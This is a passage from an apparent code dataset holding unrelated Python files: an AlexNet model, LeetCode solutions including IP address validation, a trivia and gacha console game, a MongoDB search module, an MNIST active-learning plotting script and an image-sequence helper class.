key=probability_of_being_legit_string)\n","repo_name":"dulalsaurab/cryptography","sub_path":"single_char_xor.py","file_name":"single_char_xor.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29206985937","text":"from torch import nn\n\n\nclass AlexNet(nn.Module):\n def __init__(self, args):\n super().__init__()\n self.args = args\n assert args.img_size == 227\n layers = [\n nn.Conv2d(args.img_dim, 96, 11, 4), # 96x55x55\n nn.ReLU(),\n nn.MaxPool2d(3, 2), # 96x27x27\n nn.Conv2d(96, 256, 5, 1, 2), # 256x27x27\n nn.ReLU(),\n nn.MaxPool2d(3, 2), # 256x13x13\n nn.Conv2d(256, 384, 3, 1, 1), # 384x13x13\n nn.ReLU(),\n nn.Conv2d(384, 384, 3, 1, 1), # 384x13x13\n nn.ReLU(),\n nn.Conv2d(384, 256, 3, 1, 1), # 256x13x13\n nn.ReLU(),\n nn.MaxPool2d(3, 2) # 256x6x6\n ]\n self.conv = nn.Sequential(*layers)\n layers = [\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, args.num_classes)\n ]\n self.fc = nn.Sequential(*layers)\n\n def forward(self, x):\n h = self.conv(x)\n y = self.fc(h.view(x.shape[0], -1))\n return y\n","repo_name":"songquanpeng/pytorch-classifiers","sub_path":"models/AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"4232826822","text":"# 时间复杂度: O(N^2) 空间复杂度: O(1)\r\nclass Solution:\r\n def removeElement(self, nums, val: int) -> int:\r\n i = 0\r\n while i < len(nums):\r\n if (nums[i] == val):\r\n nums.pop(i)\r\n else:\r\n i += 1\r\n return len(nums)\r\n\r\n# 时间复杂度: O(N) 空间复杂度: O(1)\r\n\r\nclass Solution2:\r\n def removeElement(self, nums, val: int) -> int:\r\n idx = 0\r\n while idx < len(nums):\r\n if nums[idx] == val:\r\n nums[idx] = nums[-1]\r\n del nums[-1]\r\n else:\r\n idx += 1\r\n return len(nums)\r\n\r\nif __name__ == \"__main__\":\r\n nums = [3, 2, 2, 3]\r\n val = 3\r\n s = Solution().removeElement(nums, val)\r\n print(s)\r\n","repo_name":"HuichuanLI/leetcode","sub_path":"leetcode/0027-Remove-Element/leetcode27.py","file_name":"leetcode27.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43063329337","text":"import random\r\nimport time\r\nimport Gacha_List\r\nimport Trivia\r\nimport Fun_Fact\r\n\r\n## Abbreviation:\r\n## Len = Length\r\n## Ques = Question\r\n## Ans = Answer\r\n\r\nApp = True\r\n\r\n## Stuff/List for Gacha\r\n\r\nGacha_Country_List = ['Germany', 'USSR', 'USA']\r\nGacha_Tier_List = ['Ultra Rare', 'Rare', 'Uncommon']\r\nGacha_Country_Len = len(Gacha_Country_List)\r\n\r\n### Germany\r\n\r\nGermany_Len_Uncommon = len(Gacha_List.Germany_Uncommon)\r\nGermany_Len_Rare = len(Gacha_List.Germany_Rare)\r\nGermany_Len_UltraRare = len(Gacha_List.Germany_UltraRare)\r\n\r\n### USSR\r\n\r\nGacha_USSR_Len_Uncommon = len(Gacha_List.USSR_Uncommon)\r\nGacha_USSR_Len_Rare = len(Gacha_List.USSR_Rare)\r\nGacha_USSR_Len_UltraRare = len(Gacha_List.USSR_UltraRare)\r\n\r\n### USA\r\n\r\nGacha_USA_Len_Uncommon = len(Gacha_List.USA_Uncommon)\r\nGacha_USA_Len_Rare = len(Gacha_List.USA_Rare)\r\nGacha_USA_Len_UltraRare = len(Gacha_List.USA_UltraRare)\r\n\r\nwhile App:\r\n print('''\r\nList of commands:\r\n 1. Trivia\r\n 2. Fun Fek\r\n 3. Help\r\n 4. Gacha Roll\r\n 5. Shutdown''')\r\n\r\n Time = time.localtime()\r\n Time_Hour = Time.tm_hour\r\n Time_Min = Time.tm_min\r\n Time_Zone = Time.tm_zone\r\n\r\n if Time_Hour > 11:\r\n Time_Meridian = 'PM'\r\n else:\r\n Time_Meridian = 'AM'\r\n\r\n print(f'''{Time_Hour}:{Time_Min} {Time_Meridian}\r\n{Time_Zone}\r\n''')\r\n\r\n Initialization = input('Enter a number >>> ')\r\n\r\n## Trivia Command\r\n\r\n if Initialization == '1':\r\n\r\n ## Variables for Trivia\r\n\r\n ## The index for the question and answer must be the same, otherwise it will break down :D\r\n\r\n Trivia_Len = len(Trivia.Trivia_Ques)\r\n Trivia_Correct = '\\nMAN, you answered it correctly!'\r\n Max_Wrong = 3\r\n\r\n ## Coding for Trivia\r\n\r\n Trivia_Loop = True\r\n Trivia_Score = 0\r\n print('\\nRound 1!')\r\n while Trivia_Loop:\r\n Trivia_Random = random.randrange(0,Trivia_Len)\r\n print(f'\\n{Trivia.Trivia_Ques[Trivia_Random]}')\r\n Wrong_Ans = 0\r\n User_Ans = input('Answer >> ')\r\n while Wrong_Ans < Max_Wrong:\r\n Answer = Trivia.Trivia_Ans[Trivia_Random]\r\n\r\n ### Lower case the answer you give so you (and I) dont have to bother using correct capitalization\r\n\r\n User_Lower_Ans = str.lower(User_Ans)\r\n\r\n ### +4 the Wrong_Ans to get to end the second loop without causing \r\n\r\n if User_Lower_Ans == Answer:\r\n print(Trivia_Correct)\r\n Trivia_Score = Trivia_Score + 1\r\n Wrong_Ans = Wrong_Ans + 4\r\n else:\r\n Wrong_Ans = Wrong_Ans + 1\r\n Tries_Left = Max_Wrong - Wrong_Ans\r\n if Wrong_Ans < Max_Wrong:\r\n print(f'\\nYou got it wong~! You\\'ve still got {Tries_Left} tries left~')\r\n else:\r\n print('\\nHA! You failed miserably, loser~!')\r\n \r\n print(\r\nf'''\r\nScore : {Trivia_Score}\r\nContinue?\r\n 1. Yes\r\n 2. No''')\r\n Trivia_Continue = input('Enter a number >>> ')\r\n if Trivia_Continue == '1':\r\n print(f'\\nRound {Trivia_Score + 1}!')\r\n Wrong_Ans = Wrong_Ans + 4\r\n else:\r\n print(\r\nf'''\r\nFinal Score : {Trivia_Score} \r\nThat concludes the Trivia :D''')\r\n\r\n ## Idk why, without the 'break', it prints 'Invalid entry has been detected'\r\n break\r\n\r\n\r\n## Fun fact Command\r\n\r\n if Initialization == '2':\r\n\r\n ## Variables for Fun fek\r\n\r\n Fun_Fact_len = len(Fun_Fact.Fun_Fact_List)\r\n\r\n ## Coding for Fun fek\r\n\r\n Fun_Loop = True\r\n while Fun_Loop:\r\n Fun_Fact_Random = random.randrange(0,Fun_Fact_len)\r\n print(f'\\n{Fun_Fact.Fun_Fact_List[Fun_Fact_Random]}')\r\n print(\r\n'''\\nMore?\r\n 1. No''')\r\n Choice = input('Enter a number >>> ')\r\n if Choice == '1':\r\n break\r\n \r\n## Help Command\r\n\r\n elif Initialization == '3':\r\n print('''\r\nBrief Explanation\r\n\r\n Trivia = A Trivia will be taken from a list, you must answer the Trivia correctly in order to pass it. However, you must answer it correctly using the correct capitalization.\r\n Fun fek = A Fun Fact will be taken from a list\r\n \r\nContact the developer through Discord :D, \r\n[Redacted]''')\r\n\r\n## Gacha Roll\r\n\r\n elif Initialization == '4':\r\n\r\n ## Useful statistic\r\n Gacha_Rolled = 0\r\n Germany_Rolled = 0\r\n USA_Rolled = 0\r\n USSR_Rolled = 0\r\n Uncommon_Rolled = 0\r\n Rare_Rolled = 0\r\n UltraRare_Rolled = 0\r\n Uncommon = 0\r\n Rare = 0\r\n Ultra_Rare= 0\r\n\r\n Gacha_Roll = int(str(input('''\\n\r\nEnter the number of times you want to roll >>> ''')))\r\n \r\n ## Gacha System to choose, even odds or unfair odds\r\n Gacha_System = input('''\\n\r\nList of Gacha Systems:\r\n1. Gaijin Style\r\n2. Fair Probability Style\r\nEnter a number >>> ''')\r\n\r\n## Unfair Gaijin Style Gacha (A game company that makes simulation, war, etc genre. The Gacha is inspired by the extremely unfair gacha in a game called 'War Thunder')\r\n \r\n if Gacha_System == '1':\r\n Gacha_Tier_List = ['Ultra Rare']\r\n Uncommon_Repetition = 995\r\n Rare_Repetition = 4\r\n\r\n Repetition_Count = 0\r\n while Repetition_Count < Uncommon_Repetition:\r\n Gacha_Tier_List.append('Uncommon')\r\n Repetition_Count = Repetition_Count + 1\r\n \r\n Repetition_Count = 0\r\n while Repetition_Count < Rare_Repetition:\r\n Gacha_Tier_List.append('Rare')\r\n Repetition_Count = Repetition_Count + 1\r\n print('\\nThe odds of the Gacha has been changed :D, enjoy the Gaijin experience!')\r\n\r\n elif Gacha_System == '2':\r\n print('\\nEnjoy your unadulterated odds :D')\r\n\r\n else:\r\n print('Invalid input has been detected.')\r\n\r\n print('\\nRewards:')\r\n while Gacha_Rolled < Gacha_Roll:\r\n Gacha_Rolled = Gacha_Rolled + 1\r\n\r\n ## So get the index of List of countries and get the country as a string in a variable\r\n\r\n Gacha_Tier_Len = len(Gacha_Tier_List)\r\n Origin = random.randrange(0,Gacha_Country_Len)\r\n Country = Gacha_Country_List[Origin]\r\n Tier_Index = random.randrange(0,Gacha_Tier_Len)\r\n Tier = Gacha_Tier_List[Tier_Index]\r\n\r\n ## Use the assigned variable and then randomly pick an index of that country in order print the vehicle that you the person rolled\r\n if Country == 'Germany':\r\n if Tier == 'Uncommon':\r\n Country_Tier = Gacha_List.Germany_Uncommon\r\n Vehicle = random.randrange(0,Germany_Len_Uncommon)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (Germany) ({Tier})')\r\n Uncommon_Rolled = Uncommon_Rolled + 1\r\n\r\n elif Tier == 'Rare':\r\n Country_Tier = Gacha_List.Germany_Rare\r\n Vehicle = random.randrange(0,Germany_Len_Rare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (Germany) ({Tier})')\r\n Rare_Rolled = Rare_Rolled + 1\r\n\r\n elif Tier == 'Ultra Rare':\r\n Country_Tier = Gacha_List.Germany_UltraRare\r\n Vehicle = random.randrange(0,Germany_Len_UltraRare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (Germany) ({Tier})')\r\n UltraRare_Rolled = UltraRare_Rolled + 1\r\n \r\n Germany_Rolled = Germany_Rolled + 1\r\n\r\n\r\n elif Country == 'USSR':\r\n if Tier == 'Uncommon':\r\n Country_Tier = Gacha_List.USSR_Uncommon\r\n Vehicle = random.randrange(0,Gacha_USSR_Len_Uncommon)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USSR) ({Tier})')\r\n Uncommon_Rolled = Uncommon_Rolled + 1\r\n\r\n elif Tier == 'Rare':\r\n Country_Tier = Gacha_List.USSR_Rare\r\n Vehicle = random.randrange(0,Gacha_USSR_Len_Rare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USSR) ({Tier})')\r\n Rare_Rolled = Rare_Rolled + 1\r\n\r\n elif Tier == 'Ultra Rare':\r\n Country_Tier = Gacha_List.USSR_UltraRare\r\n Vehicle = random.randrange(0,Gacha_USSR_Len_UltraRare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USSR) ({Tier})')\r\n UltraRare_Rolled = UltraRare_Rolled + 1\r\n\r\n USSR_Rolled = USSR_Rolled + 1\r\n\r\n elif Country == 'USA':\r\n if Tier == 'Uncommon':\r\n Country_Tier = Gacha_List.USA_Uncommon\r\n Vehicle = random.randrange(0,Gacha_USA_Len_Uncommon)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USA) ({Tier})')\r\n Uncommon_Rolled = Uncommon_Rolled + 1\r\n\r\n elif Tier == 'Rare':\r\n Country_Tier = Gacha_List.USA_Rare\r\n Vehicle = random.randrange(0,Gacha_USA_Len_Rare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USA) ({Tier})')\r\n Rare_Rolled = Rare_Rolled + 1\r\n\r\n elif Tier == 'Ultra Rare':\r\n Country_Tier = Gacha_List.USA_UltraRare\r\n Vehicle = random.randrange(0,Gacha_USA_Len_UltraRare)\r\n print(f'{Gacha_Rolled}. {Country_Tier[Vehicle]} (USA) ({Tier})')\r\n UltraRare_Rolled = UltraRare_Rolled + 1\r\n \r\n USA_Rolled = USA_Rolled + 1\r\n\r\n print(f'''\\n\r\nGacha Statistic:\r\nTotal Roll = {Gacha_Rolled}\r\nGermany Roll = {Germany_Rolled}\r\nUSSR Roll = {USSR_Rolled}\r\nUSA Roll = {USA_Rolled}\r\n\r\nUncommon Rolled = {Uncommon_Rolled}\r\nRare Rolled = {Rare_Rolled}\r\nUltra Rare Rolled = {UltraRare_Rolled}\r\n\r\nProbability:\r\nUncommon = 995/1000\r\nRare = 4/1000\r\nUltra Rare = 1/1000\r\n ''')\r\n\r\n## Exit Command\r\n\r\n elif Initialization == '5':\r\n exit()\r\n\r\n## Response For Invalid Entry\r\n\r\n else:\r\n print('\\nInvalid entry has been detected.')\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n","repo_name":"Stryklar/Projects","sub_path":"Random_Project_1/Random_Project_1 (v1.1)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1191550603","text":"def ternary_operator():\n hungry = True\n x = 'Feed the bear now!' if hungry else 'Do not feed the bear.'\n print(x)\n\n\ndef arithmetic_operators():\n x = 10\n y = 3\n z = x / y\n print(f'result is {z}')\n\n z = x // y\n print('integer division result: {}'.format(z))\n\n z = x % y\n print('remainder: ' + f'{z}')\n\n\ndef binary_operators():\n x = 45\n print(f'{x:08b}')\n print(f'{x:02x}')\n\n\nif __name__ == '__main__':\n ternary_operator()\n arithmetic_operators()\n binary_operators()\n","repo_name":"havryliuk/python-test","sub_path":"2020-05-14.py","file_name":"2020-05-14.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23611387881","text":"T = int(raw_input())\r\nfileobj = open(\"3op.txt\",\"w\")\r\nfor t in range(1,T+1):\r\n\r\n\tinp = raw_input().split(' ')\r\n\tM = int(inp[0])\r\n\tN = int(inp[1])\r\n\tres={}\r\n\ttotal=0\r\n\tboard=[]\r\n\toccupied= []\r\n\tfor i in range(M):\r\n\t\ttemp = int(\"0x\"+raw_input(),16)\r\n\t\ttemp_bin = bin(temp)\r\n\t\ttemp_bin = temp_bin[2:len(temp_bin)]\r\n\t\tif len(temp_bin) != N:\r\n\t\t\td= N-len(temp_bin)\r\n\t\t\ttemp_bin= '0'*d+temp_bin\r\n\t\tboard.append( temp_bin )\r\n\t\tocc=[]\r\n\t\tfor j in range(N):\r\n\t\t\tocc.append(0)\r\n\t\toccupied.append(occ)\r\n\r\n\tfor i in range(min(M-1,N-1),-1,-1):\r\n\t\tcurr_board=[]\r\n\t\tcurr_board_size=i+1\r\n\t\tno_of_possible_squares_x= M-i\r\n\t\tno_of_possible_squares_y= N-i\r\n\t\t#print curr_board_size ,no_of_possible_squares_x,no_of_possible_squares_y\r\n\t\tfor each_start_x in range(0,no_of_possible_squares_x):\r\n\t\t\tfor each_start_y in range(0,no_of_possible_squares_y):\r\n\t\t\t\tflag=0\r\n\t\t\t\tprev = ''\r\n\t\t\t\tfor each_y_cell in range(each_start_y,each_start_y+curr_board_size):\r\n\t\t\t\t\tfor each_x_cell in range(each_start_x,each_start_x+curr_board_size):\r\n\r\n\t\t\t\t\t\tif each_y_cell != each_start_y:\r\n\t\t\t\t\t\t\tprev= board[each_x_cell][each_y_cell-1]\r\n\t\t\t\t\t\tcurr_pos = board[each_x_cell][each_y_cell]\r\n\t\t\t\t\t\t#if prev !='':\r\n\t\t\t\t\t\tif (curr_pos == prev) or (occupied[each_x_cell][each_y_cell] == 1):\r\n\t\t\t\t\t\t\tflag=1\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\tprev = curr_pos\r\n\t\t\t\t\tif flag==1:\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tif flag == 0:\r\n\t\t\t\t\tif curr_board_size not in res.keys():\r\n\t\t\t\t\t\tres[curr_board_size] = 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tres[curr_board_size] = res[curr_board_size] +1\r\n\t\t\t\t\ttotal=total+1\r\n\t\t\t\t\tfor each_y_cell in range(each_start_y,each_start_y+curr_board_size):\r\n\t\t\t\t\t\tfor each_x_cell in range(each_start_x,each_start_x+curr_board_size):\r\n\t\t\t\t\t\t\toccupied[each_x_cell][each_y_cell] = 1\r\n\r\n\r\n\tfileobj.write( \"Case #\"+str(t)+\": \"+str(len(res.keys()))+\"\\n\")\r\n\tfor x in sorted(res.keys(),reverse=True):\r\n\t\tfileobj.write(str(x)+\" \"+str(res[x])+\"\\n\")\r\n\t\t\r\n\t#fileobj.write( \"Case #\"+str(t)+\": \"+str(total))\r\nfileobj.close()\r\n\t\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_64/40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27924224407","text":"##########################\n# Name : Minh Pham\n# Email: minh.pham@columbia.edu\n# Module contains database connection \n# and querying user input \n# the main Sloan app framework \n##########################\n\nfrom itertools import chain\nfrom pymongo import MongoClient, TEXT\n\n\n#create a db connection\nclient = MongoClient()\n\n#initialize a database\ndb = client['sloandb']\n\n#all collections\ncollections = [db.job, db.leisure, db.volunteering, db.demographics,\\\ndb.health, db.psychosocial, db.cognitive]\n\ndef get_labels():\n\t'''getting labels for index page'''\n\n\t#getting checkbox selection\n\tcursors = []\n\tfor col in collections:\n\t\tcursors.append(col.aggregate([{\"$group\":\\\n\t\t\t{\"_id\": \"$Database Section\", \"count\": {\"$sum\": 1}}}]))\n\n\t##iterate to create labels\n\tlabs = {}\n\tcursor_str = ['job','lei','vol','demo','hlth','psysoc','cogn']\n\tfor i,j in zip(cursors, cursor_str):\n\t\tx = []\n\t\tfor doc in i:\n\t\t\tx.append(doc['_id'])\n\t\tlabs[j] = x\n\n\treturn labs\n\n\n\ndef search(term):\n\t'''function to receive text search input and retuns \n\ta results iterable (not quite a MongoDB cursor) but \n\tshould be fit for purpose'''\n\n\t#create text indices\n\t#search fields: CAC Label + Initial question text\n\tfor col in collections:\n\t\tcol.create_index([('CAC Label', TEXT),\\\n\t\t\t('Question Text - First Wave Available', TEXT)],\\\n\t\t\tname= 'text_search')\n\n\t#search for input\n\tresults = []\n\tfor col in collections:\n\t\tr = col.find({\"$text\": {\"$search\": term}})\n\t\tif r.count() > 0:\n\t\t\tresults.append(r)\n\tdata = [x for x in chain(*results)]\n\n\t#drop text indices\n\tfor col in collections:\n\t\tcol.drop_index('text_search')\n\n\treturn data\n\n\ndef obtain_results(selected):\n\t'''function to gather selected checkboxes or text input'''\n\t\n\toutput = []\n\t\n\tterm = selected.pop()\n\tfor col,i in zip(collections, selected):\n\t\toutput.append(col.find({\"Database Section\" : { \"$in\": i}}))\n\n\tif len(term) > 0:\n\t\toutput.append(search(term))\n\n\treturn output\n","repo_name":"ptmminh/SloanApp","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7431298819","text":"import csv\ndef read_csv(v_object):\n\n reader = csv.reader(v_object)\n\n for row in reader:\n\n print(\",\".join(row))\n\nif __name__ == \"__main__\":\n\n csv_path = \"C:\\\\Users\\\\7307\\\\Downloads\\\\random_python_information.csv\"\n\n with open(csv_path, \"r\") as v_read:\n\n read_csv(v_read)","repo_name":"overdoseflow/i2iSystems-Pyhton-TextManipulation","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5961506957","text":"import os\nimport logging\nimport pickle\n\nimport torch\nimport torchvision\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport al\nfrom al.dataset import mnist\nfrom al.model.model_zoo.simple_cnn import ConvModel\nfrom al.model.mnist import MnistLearner\nfrom al.dataset.mnist import MnistDataset\nfrom al.train.active_train import ActiveTrain\nfrom al.helpers.experiment import set_up_experiment, load_config\nfrom al.experiments import set_up_learner\n\nDATASET = 'mnist'\n\nFOLDER_PATH = os.path.dirname(__file__)\nOUTPUT_DIR, FIGURE_DIR, logger, logger_name = set_up_experiment(\n __file__, FOLDER_PATH, logging_lvl=20)\n\n\nconfig = load_config(FOLDER_PATH, DATASET)\nsetupper = set_up_learner(DATASET)\nconfig['active_learning']['output_dir'] = OUTPUT_DIR\nconfig['experiment']['logger_name'] = logger_name\nmodel_name = config['experiment']['model']\ndataset, learner = setupper(config, OUTPUT_DIR, logger)\n\nqueried = os.path.join(os.path.dirname(__file__), 'results',\n 'queries-margin_sampling-0-simplenet.txt')\ndf = pd.read_csv(queried, header=0, skiprows=1)\n# print(df)\nquery_step = 0\nplot_size = 32\nindices = df.loc[query_step].values\n\n\nif False:\n train_dataset = dataset.dataset\n tensor = torch.stack([\n train_dataset[i][0].unsqueeze(0) for i in indices\n ])[:plot_size]\n\n print(tensor.shape)\n\n def show(img):\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)), interpolation='nearest')\n\n plot_dir = os.path.join(os.path.dirname(__file__), 'figures')\n plt.figure(figsize=(20, 10))\n show(torchvision.utils.make_grid(tensor, nrow=8))\n # plt.title(\"\", fontsize=14)\n plt.tight_layout()\n plt.axis('off')\n plt.show()\n plt.savefig(os.path.join(plot_dir, 'samples.png'), dpi=200)\n\nif True:\n digit = 8\n n = 2\n train_dataset = dataset.dataset\n for i in indices:\n if train_dataset[i][1].numpy() == digit:\n tensor = train_dataset[i][0]\n break\n\n k = 0\n for i in range(len(train_dataset)):\n if train_dataset[i][1].numpy() == digit:\n if k == n:\n clean_tensor = train_dataset[i][0]\n k += 1\n\n plot_dir = os.path.join(os.path.dirname(__file__), 'figures')\n plt.figure(figsize=(20, 10))\n plt.imshow(tensor.numpy(), cmap='gray')\n plt.tight_layout()\n plt.axis('off')\n plt.show()\n plt.savefig(os.path.join(plot_dir, 'digit_bad.png'), dpi=200)\n\n plt.figure(figsize=(20, 10))\n plt.imshow(clean_tensor.numpy(), cmap='gray')\n plt.tight_layout()\n plt.axis('off')\n plt.show()\n plt.savefig(os.path.join(plot_dir, 'digit_clean.png'), dpi=200)\n","repo_name":"kili-technology/active-learning","sub_path":"experiments/mnist_simple/samples.py","file_name":"samples.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"27087548331","text":"class Solution:\n def validIPAddress(self, IP: str) -> str:\n # check IPv4 or IPv6\n if IP.count(\".\") == 3:\n # IPv4 address validation\n return \"IPv4\" if self.checkIPv4(IP) else \"Neither\"\n elif IP.count(\":\") == 7:\n # IPv6 address validation\n return \"IPv6\" if self.checkIPv6(IP) else \"Neither\"\n else:\n return \"Neither\"\n\n def checkIPv4(self, IP):\n tokens = IP.split(\".\")\n for token in tokens:\n if not token.isdigit() or len(token) != len(str(int(token))) or int(token) > 255:\n return False\n return True\n\n def checkIPv6(self, IP):\n tokens = IP.split(\":\")\n for token in tokens:\n if len(token) <1 or len(token) > 4 or any(x in token for x in \"ghijklmnopqrstuvwxyzGHIJKLMNOPQRSTUVWXYZ\"):\n return False\n return True\n\nfrom ipaddress import ip_address, IPv6Address\nclass Solution:\n def validIPAddress(self, IP: str) -> str:\n try:\n return \"IPv6\" if type(ip_address(IP)) is IPv6Address else \"IPv4\"\n except ValueError:\n return \"Neither\"\n\nimport re\nclass Solution:\n def validIPAddress(self, IP: str) -> str:\n chunk_IPv4 = r'([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\n patten_IPv4 = re.compile(r'^(' + chunk_IPv4 + r'\\.){3}' + chunk_IPv4 + r'$')\n chunk_IPv6 = r'([0-9a-fA-F]{1,4})'\n patten_IPv6 = re.compile(r'^(' + chunk_IPv6 + r'\\:){7}' + chunk_IPv6 + r'$')\n if patten_IPv4.match(IP):\n return \"IPv4\"\n return \"IPv6\" if patten_IPv6.match(IP) else \"Neither\" \n","repo_name":"Mela2014/lc_punch","sub_path":"lc468_string.py","file_name":"lc468_string.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39181484357","text":"import os\nimport re\n\nRE_STEREO = re.compile('(%V)')\nRE_LEFT = re.compile('(left|Left)')\nRE_RIGHT = re.compile('(right|Right)')\nRE_LEFT_RIGHT = re.compile('(left|Left|right|Right)')\n\nRE_FORMAT = re.compile(\"(\\%0(\\d)d)\")\nRE_NUMBERED = re.compile('(\\d+)(?=\\.)')\nRE_PADDING = re.compile('(#+)(?=\\.)')\n\nURL_VIEW_TYPES = [\n\t'mono',\n\t'left',\n\t'right',\n\t'stereo',\n]\n\nclass Seq:\n\tdef __init__(self, url, first=None, last=None):\n\t\tself.url = os.path.abspath(url)\n\t\tif not self._isSequence():\n\t\t\traise ValueError('Url is has no padding: {0}'.format(self.url))\n\t\tself.head = ''\n\t\tself.nLength = 0\n\t\tself.tail = ''\n\t\tself._setParts()\n\t\tself.first = first\n\t\tself.last = last\n\t\tself.viewType = self.getViewType()\n\n\tdef __repr__(self):\n\t\treturn \" {0}%0{1}d{2}\".format(self.head, self.nLength, self.tail)\n\n\tdef _isSequence(self):\n\t\tformat_obj = RE_FORMAT.search(self.url)\n\t\tpadding_obj = RE_PADDING.search(self.url)\n\t\tif not (format_obj or padding_obj):\n\t\t\treturn False\n\t\treturn True\n\n\tdef _setParts(self):\n\t\tformat_obj = RE_FORMAT.search(self.url)\n\t\tpadding_obj = RE_PADDING.search(self.url)\n\t\tif padding_obj:\n\t\t\tself.head = self.url[:padding_obj.start(1)]\n\t\t\tself.tail = self.url[padding_obj.end(1):]\n\t\t\tself.nLength = len(padding_obj.group(1))\n\t\telif format_obj:\n\t\t\tself.head = self.url[:format_obj.start(1)]\n\t\t\tself.tail = self.url[format_obj.end(1):]\n\t\t\tself.nLength = int(format_obj.group(2))\n\n\tdef hasRange(self):\n\t\tif self.first and self.last:\n\t\t\treturn True\n\t\treturn False\n\n\tdef listFramesFromRange(self):\n\t\tframes = []\n\t\tif self.hasRange():\n\t\t\tfor f in range(self.first, self.last+1):\n\t\t\t\tnFile = self.head + str(f).zfill(self.nLength) + self.tail\n\t\t\t\tframes.append(nFile)\n\t\treturn frames\n\n\tdef framesExists(self):\n\t\tif not self.hasRange():\n\t\t\treturn False\n\t\tfor f in self.listFrames():\n\t\t\tif not os.path.exists(f):\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef setRangeFromBiggestChunk(self): # does not consider previous range\n\t\tpaths = self.findBiggestChunk()\n\t\tif paths:\n\t\t\tpatt = \"(\\d{0})\".format(\"{\"+str(self.nLength)+\"}\")\n\t\t\treObj = re.search(patt,paths[0] )\n\t\t\tself.first = int(reObj.group(1))\n\t\t\treObj = re.search(patt,paths[-1] )\n\t\t\tself.last = int(reObj.group(1))\n\n\tdef findExistingFrames(self): # does not consider previous range\n\t\tdir = os.path.split(self.head)[0]\n\t\tfiles = os.listdir(dir)\n\n\t\t#list matches to sequence pattern\n\t\tworthy = []\n\t\tfor f in files:\n\t\t\tpatt = \"(\\d{0})(?=\\.)\".format(\"{\"+str(self.nLength)+\"}\")\n\t\t\tfullpath = os.path.join(dir, f)\n\t\t\treObj = re.search(patt,fullpath )\n\t\t\tif reObj:\n\t\t\t\tif fullpath[:reObj.start(1)] == self.head:\n\t\t\t\t\tif fullpath[reObj.end(1):] == self.tail:\n\t\t\t\t\t\tworthy.append(fullpath)\n\n\t\treturn worthy\n\n\tdef findBiggestChunk(self):\n\t\tworthy = self.findExistingFrames()\n\t\t#chunk sublists ie: [1-10], [12-15], [18-22]\n\t\tif worthy:\n\t\t\tworthy.sort()\n\t\t\tsubSequences = []\n\t\t\tsub = []\n\t\t\tlast = None\n\t\t\tpatt = \"(\\d{0})(?=\\.)\".format(\"{\"+str(self.nLength)+\"}\")\n\t\t\tfor i in worthy:\n\t\t\t\treObj = re.search(patt, i)\n\t\t\t\tn = int(reObj.group(0))\n\n\t\t\t\tif last == None:\n\t\t\t\t\tsub.append(i)\n\t\t\t\t\tlast = n\n\t\t\t\telse:\n\t\t\t\t\tif n == last+1:\n\t\t\t\t\t\tsub.append(i)\n\t\t\t\t\t\tlast = n\n\t\t\t\t\telse:\n\t\t\t\t\t\tsubSequences.append(sub)\n\t\t\t\t\t\tsub = []\n\t\t\t\t\t\tlast = None\n\t\t\tsubSequences.append(sub)\n\n\t\t\t#find the longest sublist\n\t\t\tif subSequences:\n\t\t\t\treturn max(subSequences, key=len)\n\n\t\treturn []\n\n\tdef getViewType(self):\n\t\tisStereo = RE_STEREO.search(self.url)\n\t\tisLeft = RE_LEFT.search(self.url)\n\t\tisRight = RE_RIGHT.search(self.url)\n\n\t\tif isStereo:\n\t\t\treturn URL_VIEW_TYPES[3]\n\t\telif isLeft:\n\t\t\treturn URL_VIEW_TYPES[1]\n\t\telif isRight:\n\t\t\treturn URL_VIEW_TYPES[2]\n\t\telse:\n\t\t\treturn 